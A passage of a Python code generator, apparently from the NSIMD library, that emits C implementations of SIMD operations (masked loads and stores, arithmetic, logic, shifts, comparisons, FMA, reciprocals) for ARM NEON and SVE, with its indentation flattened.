return 'return svsel_{suf}({in0}, svld1_{suf}({in0}, {in1}), {oz});'. \
format(oz='{in2}'.format(**fmtspec) if oz == 'o' \
else 'svdup_n_{suf}(({typ})0)'.format(**fmtspec),
**fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vf64 ret;
if ({in0}.v0) {{
ret.v0 = {in1}[0];
}} else {{
ret.v0 = {oz0};
}}
if ({in0}.v1) {{
ret.v1 = {in1}[1];
}} else {{
ret.v1 = {oz1};
}}
return ret;'''.format(
oz0 = '0.0f' if oz == 'z' else '{in2}.v0'.format(**fmtspec),
oz1 = '0.0f' if oz == 'z' else '{in2}.v1'.format(**fmtspec),
**fmtspec)
le = 128 // int(typ[1:])
normal = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
vst1q_{suf}(buf, {oz});
vst1q_u{typnbits}(mask, {in0});
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
buf[i] = {in1}[i];
}}
}}
return vld1q_{suf}(buf);'''. \
format(oz='vdupq_n_{suf}(({typ})0)'.format(**fmtspec) \
if oz == 'z' else '{in2}'.format(**fmtspec),
le=le, **fmtspec)
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
int i;
nsimd_{simd_ext}_vf16 ret;
f32 buf[8];
u32 mask[8];
vst1q_f32(buf, {oz0});
vst1q_f32(buf + 4, {oz1});
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + 4, {in0}.v1);
for (i = 0; i < 8; i++) {{
if (mask[i]) {{
buf[i] = nsimd_f16_to_f32({in1}[i]);
}}
}}
ret.v0 = vld1q_f32(buf);
ret.v1 = vld1q_f32(buf + 4);
return ret;
#endif'''. \
format(oz0='vdupq_n_f32(0.0f)'.format(**fmtspec) \
if oz == 'z' else '{in2}.v0'.format(**fmtspec),
oz1='vdupq_n_f32(0.0f)'.format(**fmtspec) \
if oz == 'z' else '{in2}.v1'.format(**fmtspec),
normal=normal, **fmtspec)
return normal
# -----------------------------------------------------------------------------
# Stores of degree 1, 2, 3 and 4
def store1234(opts, simd_ext, typ, deg):
if simd_ext in neon:
if deg == 1:
normal = 'vst{deg}q_{suf}({in0}, {in1});'. \
format(deg=deg, **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
f32 buf[4];
vst1q_f32(buf, {in1}.v0);
*((u16*){in0} ) = nsimd_f32_to_u16(buf[0]);
*((u16*){in0} + 1) = nsimd_f32_to_u16(buf[1]);
*((u16*){in0} + 2) = nsimd_f32_to_u16(buf[2]);
*((u16*){in0} + 3) = nsimd_f32_to_u16(buf[3]);
vst1q_f32(buf, {in1}.v1);
*((u16*){in0} + 4) = nsimd_f32_to_u16(buf[0]);
*((u16*){in0} + 5) = nsimd_f32_to_u16(buf[1]);
*((u16*){in0} + 6) = nsimd_f32_to_u16(buf[2]);
*((u16*){in0} + 7) = nsimd_f32_to_u16(buf[3]);
#endif'''.format(normal=normal, **fmtspec)
elif typ == 'f64' and simd_ext == 'neon128':
return \
'''*{in0} = {in1}.v0;
*({in0} + 1) = {in1}.v1;'''.format(**fmtspec)
else:
return normal
else:
normal = \
'''{soa_typ} buf;
{assignment}
vst{deg}q_{suf}({in0}, buf);'''. \
format(deg=deg, assignment='\n'.join([
'buf.val[{{}}] = {{in{}}};'.format(i). \
format(i - 1, **fmtspec) for i in range(1, deg + 1)]),
soa_typ=get_native_soa_typ(simd_ext, typ, deg),
**fmtspec)
if typ == 'f16':
assignment = \
'''nsimd_storeu_{{simd_ext}}_f16((f16 *)buf, {{in{}}});
temp.val[{{}}] = vld1q_u16(buf);'''
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
{soa_typ} temp;
u16 buf[8];
{assignment}
vst{deg}q_u16((u16 *){in0}, temp);
#endif'''. \
format(assignment='\n'.join([assignment.format(i). \
format(i - 1, **fmtspec) \
for i in range(1, deg + 1)]),
deg=deg, normal=normal,
soa_typ=get_native_soa_typ(simd_ext, 'u16', deg),
**fmtspec)
elif typ == 'f64' and simd_ext == 'neon128':
return \
'\n'.join(['*({{in0}} + {}) = {{in{}}}.v0;'. \
format(i - 1, i).format(**fmtspec) \
for i in range(1, deg + 1)]) + '\n' + \
'\n'.join(['*({{in0}} + {}) = {{in{}}}.v1;'. \
format(i + deg - 1, i).format(**fmtspec) \
for i in range(1, deg + 1)])
elif typ in ['i64', 'u64'] and simd_ext == 'neon128':
return \
'{typ} buf[{biglen}];'.format(biglen=2 * deg, **fmtspec) + \
'\n'.join(['vst1q_{{suf}}(buf + {im1x2}, {{in{i}}});'. \
format(im1x2=2 * (i - 1), i=i).format(**fmtspec) \
for i in range(1, deg + 1)]) + \
'\n'.join(['''*({in0} + {i}) = buf[{ix2}];
*({in0} + {ipd}) = buf[{ix2p1}];'''. \
format(i=i, ipd=i + deg, ix2=i * 2,
ix2p1=2 * i + 1, **fmtspec) \
for i in range(0, deg)])
else:
return normal
else:
if deg == 1:
return 'svst{deg}_{suf}({svtrue}, {in0}, {in1});'. \
format(deg=deg, **fmtspec)
fill_soa_typ = \
'\n'.join(['tmp = svset{{deg}}_{{suf}}(tmp, {im1}, {{in{i}}});'. \
format(im1=i - 1, i=i).format(deg=deg, **fmtspec) \
for i in range(1, deg + 1)])
return \
'''{soa_typ} tmp = svundef{deg}_{suf}();
{fill_soa_typ}
svst{deg}_{suf}({svtrue}, {in0}, tmp);'''. \
format(soa_typ=get_native_soa_typ('sve', typ, deg), deg=deg,
fill_soa_typ=fill_soa_typ, **fmtspec)
# -----------------------------------------------------------------------------
# Mask stores
def mask_store(simd_ext, typ):
if simd_ext in sve:
return 'svst1_{suf}({in0}, {in1}, {in2});'.format(**fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''if ({in0}.v0) {{
{in1}[0] = {in2}.v0;
}}
if ({in0}.v1) {{
{in1}[1] = {in2}.v1;
}}'''.format(**fmtspec)
le = 128 // int(typ[1:])
normal = '''int i;
{typ} buf[{le}];
u{typnbits} mask[{le}];
vst1q_{suf}(buf, {in2});
vst1q_u{typnbits}(mask, {in0});
for (i = 0; i < {le}; i++) {{
if (mask[i]) {{
{in1}[i] = buf[i];
}}
}}'''.format(le=le, **fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{normal}
#else
f32 buf[8];
u32 mask[8];
int i;
vst1q_u32(mask, {in0}.v0);
vst1q_u32(mask + 4, {in0}.v1);
vst1q_f32(buf, {in2}.v0);
vst1q_f32(buf + 4, {in2}.v1);
for (i = 0; i < 8; i++) {{
if (mask[i]) {{
{in1}[i] = nsimd_f32_to_f16(buf[i]);
}}
}}
#endif'''.format(normal=normal, **fmtspec)
return normal
# -----------------------------------------------------------------------------
# Length
def len1(simd_ext, typ):
if simd_ext in neon:
return 'return {};'.format(128 // int(typ[1:]))
elif simd_ext == 'sve':
return 'return (int)svcntp_b{typnbits}({svtrue}, {svtrue});'. \
format(**fmtspec)
elif simd_ext in fixed_sized_sve:
return 'return {};'.format(int(simd_ext[3:]) // int(typ[1:]))
# -----------------------------------------------------------------------------
# Add/sub
def addsub(op, simd_ext, typ):
ret = f16f64(simd_ext, typ, op, op, 2)
if ret != '':
return ret
if simd_ext in neon:
return 'return v{op}q_{suf}({in0}, {in1});'. \
format(op=op, **fmtspec)
else:
return 'return sv{op}_{suf}_x({svtrue}, {in0}, {in1});'. \
format(op=op, **fmtspec)
# -----------------------------------------------------------------------------
# Multiplication
def mul2(simd_ext, typ):
ret = f16f64(simd_ext, typ, 'mul', 'mul', 2)
if ret != '':
return ret
elif simd_ext in neon and typ in ['i64', 'u64']:
return emulate_op2('*', simd_ext, typ)
else:
if simd_ext in neon:
return 'return vmulq_{suf}({in0}, {in1});'.format(**fmtspec)
else:
return 'return svmul_{suf}_x({svtrue}, {in0}, {in1});'. \
format(**fmtspec)
# -----------------------------------------------------------------------------
# Division
def div2(simd_ext, typ):
if simd_ext == 'aarch64' and typ in ['f32', 'f64']:
return 'return vdivq_{suf}({in0}, {in1});'.format(**fmtspec)
elif simd_ext in sve and \
typ in ['f16', 'f32', 'f64', 'i32', 'u32', 'i64', 'u64']:
return 'return svdiv_{suf}_x({svtrue}, {in0}, {in1});'. \
format(**fmtspec)
else:
ret = f16f64(simd_ext, typ, 'div', 'div', 2)
if ret != '':
return ret
return emulate_op2('/', simd_ext, typ)
# -----------------------------------------------------------------------------
# Binary operators: and, or, xor, andnot
def binop2(op, simd_ext, typ):
armop = {'orb': 'orr', 'xorb': 'eor', 'andb': 'and', 'andnotb': 'bic'}
if typ in common.iutypes:
if simd_ext in neon:
return 'return v{armop}q_{suf}({in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
else:
return 'return sv{armop}_{suf}_x({svtrue}, {in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
# From here only float types
if typ == 'f16':
intrinsics = \
'''return vreinterpretq_f16_u16(v{armop}q_u16(vreinterpretq_u16_f16(
{in0}), vreinterpretq_u16_f16({in1})));'''. \
format(armop=armop[op], **fmtspec)
else:
intrinsics = ''
ret = f16f64(simd_ext, typ, op, armop[op], 2, intrinsics)
if ret != '':
return ret
if simd_ext in neon:
return \
'''return vreinterpretq_f{typnbits}_u{typnbits}(v{armop}q_u{typnbits}(
vreinterpretq_u{typnbits}_f{typnbits}({in0}),
vreinterpretq_u{typnbits}_f{typnbits}({in1})));'''. \
format(armop=armop[op], **fmtspec)
else:
return \
'''return svreinterpret_f{typnbits}_u{typnbits}(
sv{armop}_u{typnbits}_x({svtrue},
svreinterpret_u{typnbits}_f{typnbits}({in0}),
svreinterpret_u{typnbits}_f{typnbits}({in1})));'''. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Binary not
def not1(simd_ext, typ):
if typ in common.iutypes:
if simd_ext in neon:
if typ in ['i8', 'u8', 'i16', 'u16', 'i32', 'u32']:
return 'return vmvnq_{suf}({in0});'.format(**fmtspec)
else:
return \
'''return vreinterpretq_{suf}_u32(vmvnq_u32(
vreinterpretq_u32_{suf}({in0})));'''. \
format(**fmtspec)
if simd_ext in sve:
return 'return svnot_{suf}_x({svtrue}, {in0});'.format(**fmtspec)
# From here only float types
if typ == 'f16':
intrinsics = \
'''return vreinterpretq_f16_u16(vmvnq_u16(vreinterpretq_u16_f16(
{in0})));'''.format(**fmtspec)
else:
intrinsics = ''
ret = f16f64(simd_ext, typ, 'notb', 'mvn', 1, intrinsics)
if ret != '':
return ret
if simd_ext in neon:
return \
'''return vreinterpretq_{suf}_u32(vmvnq_u32(
vreinterpretq_u32_{suf}({in0})));'''. \
format(**fmtspec)
else:
return \
'''return svreinterpret_{suf}_u{typnbits}(svnot_u{typnbits}_x(
{svtrue}, svreinterpret_u{typnbits}_{suf}({in0})));'''. \
format(**fmtspec)
# -----------------------------------------------------------------------------
# Logical operators: and, or, xor, andnot
def lop2(opts, op, simd_ext, typ):
armop = {'orl': 'orr', 'xorl': 'eor', 'andl': 'and', 'andnotl': 'bic'}
if simd_ext in neon:
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
return v{armop}q_u16({in0}, {in1});
#else
nsimd_{simd_ext}_vlf16 ret;
ret.v0 = v{armop}q_u32({in0}.v0, {in1}.v0);
ret.v1 = v{armop}q_u32({in0}.v1, {in1}.v1);
return ret;
#endif'''.format(armop=armop[op], **fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
if op == 'andnotl':
return '''nsimd_{simd_ext}_vlf64 ret;
ret.v0 = {in0}.v0 & (~{in1}.v0);
ret.v1 = {in0}.v1 & (~{in1}.v1);
return ret;'''.format(**fmtspec)
else:
cpuop = {'orl': '|', 'xorl': '^', 'andl': '&'}
return '''nsimd_{simd_ext}_vlf64 ret;
ret.v0 = {in0}.v0 {cpuop} {in1}.v0;
ret.v1 = {in0}.v1 {cpuop} {in1}.v1;
return ret;'''.format(cpuop=cpuop[op], **fmtspec)
else:
return 'return v{armop}q_u{typnbits}({in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
else:
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return \
'''return sv{armop}_x({svtrue},
(svuint{typnbits}_t){in0},
(svuint{typnbits}_t){in1});'''. \
format(armop=armop[op], **fmtspec)
else:
return '''return sv{armop}_z({svtrue}, {in0}, {in1});'''. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Logical not
def lnot1(opts, simd_ext, typ):
if simd_ext in neon:
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
return vmvnq_u16({in0});
#else
nsimd_{simd_ext}_vlf16 ret;
ret.v0 = vmvnq_u32({in0}.v0);
ret.v1 = vmvnq_u32({in0}.v1);
return ret;
#endif'''.format(**fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vlf64 ret;
ret.v0 = ~{in0}.v0;
ret.v1 = ~{in0}.v1;
return ret;'''.format(**fmtspec)
elif typ in ['i64', 'u64', 'f64']:
return '''return vreinterpretq_u{typnbits}_u32(vmvnq_u32(
vreinterpretq_u32_u{typnbits}({in0})));'''. \
format(**fmtspec)
else:
return 'return vmvnq_u{typnbits}({in0});'.format(**fmtspec)
elif simd_ext in sve:
if opts.sve_emulate_bool:
# TODO: the cast is a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return 'return svnot_x({svtrue}, (svuint{typnbits}_t){in0});'.format(**fmtspec)
else:
return 'return svnot_z({svtrue}, {in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Square root
def sqrt1(simd_ext, typ):
if simd_ext == 'neon128':
if typ in 'f16':
return '''nsimd_neon128_vf16 ret;
ret.v0 = nsimd_sqrt_neon128_f32({in0}.v0);
ret.v1 = nsimd_sqrt_neon128_f32({in0}.v1);
return ret;'''.format(**fmtspec)
elif typ == 'f64':
return f16f64('neon128', 'f64', 'sqrt', 'sqrt', 1)
else:
return emulate_op1('sqrt', simd_ext, typ)
elif simd_ext == 'aarch64':
if typ == 'f16':
return f16f64('aarch64', 'f16', 'sqrt', 'sqrt', 1)
else:
return 'return vsqrtq_{suf}({in0});'.format(**fmtspec)
else:
return 'return svsqrt_{suf}_x({svtrue}, {in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Shifts
def shl_shr(op, simd_ext, typ):
if simd_ext in neon:
sign = '-' if op == 'shr' else ''
if typ in common.utypes:
return '''return vshlq_{suf}({in0}, vdupq_n_s{typnbits}(
(i{typnbits})({sign}{in1})));'''. \
format(sign=sign, **fmtspec)
else:
return \
'''return vreinterpretq_s{typnbits}_u{typnbits}(vshlq_u{typnbits}(
vreinterpretq_u{typnbits}_s{typnbits}({in0}),
vdupq_n_s{typnbits}((i{typnbits})({sign}{in1}))));'''. \
format(sign=sign, **fmtspec)
else:
armop = 'lsl' if op == 'shl' else 'lsr'
if op == 'shr' and typ in common.itypes:
return \
'''return svreinterpret_{suf}_{suf2}(sv{armop}_{suf2}_x({svtrue},
svreinterpret_{suf2}_{suf}({in0}),
svdup_n_u{typnbits}((u{typnbits}){in1})));'''. \
format(suf2=common.bitfield_type[typ], armop=armop,
**fmtspec)
else:
return '''return sv{armop}_{suf}_x({svtrue}, {in0},
svdup_n_u{typnbits}((u{typnbits}){in1}));'''. \
format(armop=armop, **fmtspec)
def shra(simd_ext, typ):
if typ in common.utypes:
return '''return nsimd_shr_{simd_ext}_{typ}({in0}, {in1});'''. \
format(**fmtspec)
if simd_ext in neon:
return '''return vshlq_{suf}(
{in0}, vdupq_n_s{typnbits}((i{typnbits})-{in1}));'''.\
format(**fmtspec)
elif simd_ext in sve:
if typ[0] == 'i':
return '''return svasr_n_{suf}_x({svtrue}, {in0},
(u{typnbits}){in1});'''.\
format(**fmtspec)
elif typ[0] == 'u':
return 'return svlsl_n_{suf}_x({svtrue}, {in0}, (u64){in1});'.\
format(**fmtspec)
# -----------------------------------------------------------------------------
# Set1
def set1(simd_ext, typ):
if simd_ext in neon:
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
return vdupq_n_f16({in0});
#else
nsimd_{simd_ext}_vf16 ret;
f32 f = nsimd_f16_to_f32({in0});
ret.v0 = nsimd_set1_{simd_ext}_f32(f);
ret.v1 = nsimd_set1_{simd_ext}_f32(f);
return ret;
#endif'''.format(**fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0};
ret.v1 = {in0};
return ret;'''.format(**fmtspec)
else:
return 'return vdupq_n_{suf}({in0});'.format(**fmtspec)
else:
return 'return svdup_n_{suf}({in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Set1l
def lset1(simd_ext, typ):
if simd_ext in sve:
return '''if ({in0}) {{
return svptrue_b{typnbits}();
}} else {{
return svpfalse_b();
}}'''.format(**fmtspec)
# getting here means no NEON and AARCH64 only
mask = 'vdupq_n_u{typnbits}((u{typnbits}){{}})'.format(**fmtspec)
normal = '''if ({in0}) {{
return {ones};
}} else {{
return {zeros};
}}'''.format(ones=mask.format('-1'), zeros=mask.format('0'),
**fmtspec)
if typ == 'f16':
return '''#ifdef NSIMD_ARM_FP16
{normal}
#else
nsimd_{simd_ext}_vlf16 ret;
ret.v0 = nsimd_set1l_{simd_ext}_f32({in0});
ret.v1 = ret.v0;
return ret;
#endif'''.format(normal=normal, **fmtspec)
if typ == 'f64' and simd_ext == 'neon128':
return '''nsimd_neon128_vlf64 ret;
ret.v0 = (u64)({in0} ? -1 : 0);
ret.v1 = ret.v0;
return ret;'''.format(**fmtspec)
return normal
# -----------------------------------------------------------------------------
# Comparison operators: ==, <, <=, >, >=
def cmp2(opts, op, simd_ext, typ):
binop = {'eq': '==', 'lt': '<', 'le': '<=', 'gt': '>', 'ge': '>='}
armop = {'eq': 'eq', 'lt': 'lt', 'le': 'le', 'gt': 'gt', 'ge': 'ge'}
if simd_ext in neon:
emul_f16 = '''nsimd_{simd_ext}_vlf16 ret;
ret.v0 = nsimd_{op}_{simd_ext}_f32({in0}.v0, {in1}.v0);
ret.v1 = nsimd_{op}_{simd_ext}_f32({in0}.v1, {in1}.v1);
return ret;'''.format(op=op, **fmtspec)
normal = 'return vc{armop}q_{suf}({in0}, {in1});'. \
format(armop=armop[op], **fmtspec)
if typ == 'f16':
if simd_ext == 'neon128':
return emul_f16
else:
return \
'''#ifdef NSIMD_ARM_FP16
{}
#else
{}
#endif'''.format(normal, emul_f16)
if simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_{simd_ext}_vl{typ} ret;
ret.v0 = {in0}.v0 {op} {in1}.v0 ? (u64)-1 : 0;
ret.v1 = {in0}.v1 {op} {in1}.v1 ? (u64)-1 : 0;
return ret;'''.format(op=binop[op], **fmtspec)
elif simd_ext == 'neon128' and typ in ['i64', 'u64']:
return '''{typ} buf0[2], buf1[2];
u64 ret[2];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
ret[0] = buf0[0] {op} buf1[0] ? (u64)-1 : 0;
ret[1] = buf0[1] {op} buf1[1] ? (u64)-1 : 0;
return vld1q_u64(ret);'''. \
format(op=binop[op], **fmtspec)
else:
return normal
elif simd_ext in sve:
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
comp = 'svcmp{op}_{suf}({svtrue}, ({svetyp}){in0}, ({svetyp}){in1})'. \
format(op=armop[op], **fmtspec)
return 'return {};'.format(convert_from_predicate(opts, comp))
else:
return 'return svcmp{op}_{suf}({svtrue}, {in0}, {in1});'. \
format(op=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Not equal
def neq2(opts, simd_ext, typ):
if simd_ext in neon:
return '''return nsimd_notl_{simd_ext}_{typ}(
nsimd_eq_{simd_ext}_{typ}({in0}, {in1}));'''. \
format(**fmtspec)
elif simd_ext in sve:
comp='svcmpne_{suf}({svtrue}, {in0}, {in1})'. \
format(**fmtspec)
return 'return {};'.format(convert_from_predicate(opts, comp))
# -----------------------------------------------------------------------------
# If_else
def if_else3(opts, simd_ext, typ):
if simd_ext in neon:
intrinsic = 'return vbslq_{suf}({in0}, {in1}, {in2});'. \
format(**fmtspec)
if typ == 'f16':
return \
'''#ifdef NSIMD_ARM_FP16
{intrinsic}
#else
nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_if_else1_{simd_ext}_f32(
{in0}.v0, {in1}.v0, {in2}.v0);
ret.v1 = nsimd_if_else1_{simd_ext}_f32(
{in0}.v1, {in1}.v1, {in2}.v1);
return ret;
#endif'''.format(intrinsic=intrinsic, **fmtspec)
elif simd_ext == 'neon128' and typ == 'f64':
return '''nsimd_neon128_vf64 ret;
ret.v0 = {in0}.v0 != 0u ? {in1}.v0 : {in2}.v0;
ret.v1 = {in0}.v1 != 0u ? {in1}.v1 : {in2}.v1;
return ret;'''.format(**fmtspec)
else:
return intrinsic
elif simd_ext in sve:
if opts.sve_emulate_bool:
# TODO: the casts are a workaround to avoid a bug in gcc trunk for sve
# it needs to be deleted when the bug is corrected
return 'return svsel_{suf}({cond}, ({svetyp}){in1}, ({svetyp}){in2});' \
.format(cond=convert_to_predicate(opts,
'{in0}'.format(**fmtspec)),
**fmtspec)
else:
return 'return svsel_{suf}({in0}, {in1}, {in2});' \
.format(**fmtspec)
# -----------------------------------------------------------------------------
# Minimum and maximum
def minmax2(op, simd_ext, typ):
ret = f16f64(simd_ext, typ, op, op, 2)
if ret != '':
return ret
if simd_ext in neon:
if typ in ['i64', 'u64']:
binop = '<' if op == 'min' else '>'
return '''{typ} buf0[2], buf1[2];
vst1q_{suf}(buf0, {in0});
vst1q_{suf}(buf1, {in1});
buf0[0] = buf0[0] {binop} buf1[0] ? buf0[0] : buf1[0];
buf0[1] = buf0[1] {binop} buf1[1] ? buf0[1] : buf1[1];
return vld1q_{suf}(buf0);'''. \
format(binop=binop, **fmtspec)
else:
return 'return v{op}q_{suf}({in0}, {in1});'. \
format(op=op, **fmtspec)
else:
return 'return sv{op}_{suf}_x({svtrue}, {in0}, {in1});'. \
format(op=op, **fmtspec)
# -----------------------------------------------------------------------------
# Abs
def abs1(simd_ext, typ):
if typ in common.utypes:
return 'return {in0};'.format(**fmtspec)
elif simd_ext in neon:
if typ == 'f16':
return f16f64(simd_ext, 'f16', 'abs', 'abs', 1)
elif (typ in ['i8', 'i16', 'i32', 'f32']) or \
(simd_ext == 'aarch64' and typ in ['i64', 'f64']):
return 'return vabsq_{suf}({in0});'.format(**fmtspec)
elif typ == 'i64':
return emulate_op1('abs', 'neon128', 'i64')
else:
return f16f64(simd_ext, 'f64', 'abs', 'abs', 1)
else:
return 'return svabs_{suf}_x({svtrue}, {in0});'. \
format(**fmtspec)
# -----------------------------------------------------------------------------
# Round, trunc, ceil and round_to_even
def round1(op, simd_ext, typ):
if typ in common.iutypes:
return 'return {in0};'.format(**fmtspec)
armop = {'floor': 'rndm', 'ceil': 'rndp', 'trunc': 'rnd',
'round_to_even': 'rndn'}
if simd_ext == 'neon128':
ret = f16f64('neon128', typ, op, 'v{armop}q_{suf}'. \
format(armop=armop, **fmtspec), 1)
if ret != '':
return ret
return emulate_op1(op, 'neon128', typ);
elif simd_ext == 'aarch64':
if typ == 'f16':
return f16f64('aarch64', 'f16', op, armop[op], 1)
else:
return 'return v{armop}q_{suf}({in0});'. \
format(armop=armop[op], **fmtspec)
else:
armop = {'floor': 'rintm', 'ceil': 'rintp', 'trunc': 'rintz',
'round_to_even': 'rintn'}
return 'return sv{armop}_{suf}_x({svtrue}, {in0});'. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# FMA and FNMA
def fmafnma3(op, simd_ext, typ):
if typ in common.ftypes and simd_ext == 'aarch64':
armop = {'fma': 'fma', 'fnma': 'fms'}
else:
armop = {'fma': 'mla', 'fnma': 'mls'}
if simd_ext in neon:
normal = 'return v{armop}q_{suf}({in2}, {in1}, {in0});'. \
format(armop=armop[op], **fmtspec)
emul = emulate_op3_neon(op, simd_ext, typ)
if typ == 'f16':
using_f32 = \
'''nsimd_{simd_ext}_vf16 ret;
ret.v0 = nsimd_{op}_{simd_ext}_f32({in0}.v0, {in1}.v0, {in2}.v0);
ret.v1 = nsimd_{op}_{simd_ext}_f32({in0}.v1, {in1}.v1, {in2}.v1);
return ret;'''.format(op=op, **fmtspec)
if simd_ext == 'aarch64':
return \
'''#ifdef NSIMD_ARM_FP16
{}
#else
{}
#endif'''.format(emul, using_f32)
else:
return using_f32
elif simd_ext == 'neon128' and typ == 'f64':
return emulate_f64_neon('neon128', op, ['v'] * 4)
elif simd_ext == 'aarch64' and typ == 'f64':
return normal
elif typ in ['i64', 'u64']:
return emul
else:
return normal
else:
return 'return sv{armop}_{suf}_x({svtrue}, {in2}, {in1}, {in0});'. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# FMS and FNMS
def fmsfnms3(op, simd_ext, typ):
if typ in common.iutypes:
return \
'''return nsimd_neg_{simd_ext}_{typ}(nsimd_{op2}_{simd_ext}_{typ}(
{in0}, {in1}, {in2}));'''. \
format(op2='fma' if op == 'fnms' else 'fnma', **fmtspec)
if simd_ext in neon:
return \
'''return nsimd_{op2}_{simd_ext}_{typ}({in0}, {in1},
nsimd_neg_{simd_ext}_{typ}({in2}));'''. \
format(op2='fma' if op == 'fms' else 'fnma', **fmtspec)
else:
armop = {'fnms': 'nmla', 'fms': 'nmls'}
return 'return sv{armop}_{suf}_x({svtrue}, {in2}, {in1}, {in0});'. \
format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Neg
def neg1(simd_ext, typ):
if simd_ext in neon:
normal = 'return vnegq_{suf}({in0});'.format(**fmtspec)
if typ == 'f16':
return f16f64(simd_ext, 'f16', 'neg', 'neg', 1)
elif typ in ['i8', 'i16', 'i32', 'f32']:
return normal
elif typ in ['u8', 'u16', 'u32']:
return \
'''return vreinterpretq_{suf}_s{typnbits}(
vnegq_s{typnbits}(
vreinterpretq_s{typnbits}_{suf}({in0})));'''. \
format(**fmtspec)
elif simd_ext == 'neon128' and typ in ['i64', 'u64']:
return emulate_op1('neg', simd_ext, typ)
elif simd_ext == 'neon128' and typ == 'f64':
return \
'''nsimd_neon128_vf64 ret;
ret.v0 = -{in0}.v0;
ret.v1 = -{in0}.v1;
return ret;'''.format(**fmtspec)
elif simd_ext == 'aarch64' and typ in ['f64', 'i64']:
return normal
elif simd_ext == 'aarch64' and typ == 'u64':
return \
'''return vreinterpretq_u64_s64(vnegq_s64(
vreinterpretq_s64_u64({in0})));'''. \
format(**fmtspec)
else:
if typ in common.utypes:
return \
'''return svreinterpret_{suf}_s{typnbits}(
svneg_s{typnbits}_x({svtrue},
svreinterpret_s{typnbits}_{suf}({in0})));'''. \
format(**fmtspec)
else:
return 'return svneg_{suf}_x({svtrue}, {in0});'.format(**fmtspec)
# -----------------------------------------------------------------------------
# Reciprocals
def recs1(op, simd_ext, typ):
cte = '({typ})1'.format(**fmtspec) if typ != 'f16' \
else 'nsimd_f32_to_f16(1.0f)'
if op in ['rec', 'rec11']:
return \
'''return nsimd_div_{simd_ext}_{typ}(
nsimd_set1_{simd_ext}_{typ}({cte}), {in0});'''. \
format(cte=cte, **fmtspec)
elif op == 'rsqrt11':
return \
'''return nsimd_div_{simd_ext}_{typ}(
nsimd_set1_{simd_ext}_{typ}({cte}),
nsimd_sqrt_{simd_ext}_{typ}({in0}));'''. \
format(cte=cte, **fmtspec)
elif op in ['rec8', 'rsqrt8']:
armop = 'recpe' if op == 'rec8' else 'rsqrte'
if simd_ext in sve:
return 'return sv{armop}_{suf}({in0});'. \
format(armop=armop, **fmtspec)
else:
ret = f16f64(simd_ext, typ, op, armop, 1)
if ret != '':
return ret
return 'return v{armop}q_{suf}({in0});'. \
format(armop=armop, **fmtspec)
# Rec11 and rsqrt11
# According to http://infocenter.arm.com/help/topic/com.arm.doc.faqs/ka14282.html
# reciprocal estimates only work when inputs is restrained in some small
# interval so we comment these for now and return full-precision reciprocals.
# def rec11rsqrt11(op, simd_ext, typ):
# armop = {'rec11': 'recpe', 'rsqrt11': 'rsqrte'}
# if simd_ext in neon:
# ret = f16f64(simd_ext, typ, op, armop[op], 1)
# if ret != '':
# return ret
# return 'return v{armop}q_{suf}({in0});'. \
# format(armop=armop[op], **fmtspec)
# else:
# return 'return sv{armop}_{suf}({in0});'. \
# format(armop=armop[op], **fmtspec)
# -----------------------------------------------------------------------------
# Load of logicals
def loadl(aligned, simd_ext, typ):
return \
'''/* This can surely be improved but it is not our priority. */
return nsimd_notl_{simd_ext}_{typ}(nsimd_eq_{simd_ext}_{typ}(
nsimd_load{align}_{simd_ext}_{typ}(
{in0}), nsimd_set1_{simd_ext}_{typ}({zero})));'''. \
format(align='a' if aligned else 'u',
zero = 'nsimd_f32_to_f16(0.0f)' if typ == 'f16'
else '({})0'.format(typ), **fmtspec)
# -----------------------------------------------------------------------------
# Store of logicals
def storel(aligned, simd_ext, typ):
return \
'''/* This can surely be improved but it is not our priority. */
nsimd_store{align}_{simd_ext}_{typ}({in0},
nsimd_if_else1_{simd_ext}_{typ}({in1},
nsimd_set1_{simd_ext}_{typ}({one}),
nsimd_set1_{simd_ext}_{typ}({zero})));'''. \
format(align = 'a' if aligned else 'u',
one = 'nsimd_f32_to_f16(1.0f)' if typ == 'f16'
else '({})1'.format(typ),
zero = 'nsimd_f32_to_f16(0.0f)' if typ == 'f16'
else '({})0'.format(typ), **fmtspec)
# -----------------------------------------------------------------------------
# All and any
def allany1(opts, op, simd_ext, typ):
binop = '&&' if op == 'all' else '||'
if simd_ext == 'neon128':
if typ == 'f16':
return \
